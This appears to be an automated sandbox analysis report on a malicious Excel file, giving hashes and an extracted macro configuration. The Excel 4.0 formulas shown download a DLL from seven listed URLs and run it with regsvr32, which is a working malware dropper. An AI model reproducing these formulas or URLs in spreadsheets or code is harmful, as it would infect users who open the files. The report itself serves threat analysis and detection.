Static task: static1

Behavioral task: behavioral1
Sample: c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx
Resource: win10v2004-20240802-en
General
Target: c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
Size: 46KB
MD5: becb7a238516b57164e3aa3eefdcecbf
SHA1: aabdfc17de5e1b94a2f2c523f3e7122897bb2fee
SHA256: c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
SHA512: cdc8fd1eb39d47d19e0ce86f0c074f73f100ad2639e21579aae1ecb2108bd6def16bf850eb5b55a5017b37c9e1071061b3ea975065512b6260c91d415f0c2f98
SSDEEP: 768:mCra70og13bQiBpFViBYYg8z/cZ2IQYRAvYUbTUPMr7nIIbwPvvfOa6rw7M39vdY:zraQog5bz3iBC8z/XYCpK60Ibwv3OHsL
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0)
=IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0))
=IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0))
=IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0))
=IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0))
=IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0))
=IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0))
=IF('EGVEB'!D21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll")
=RETURN()
Signatures
Files
-
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx office2007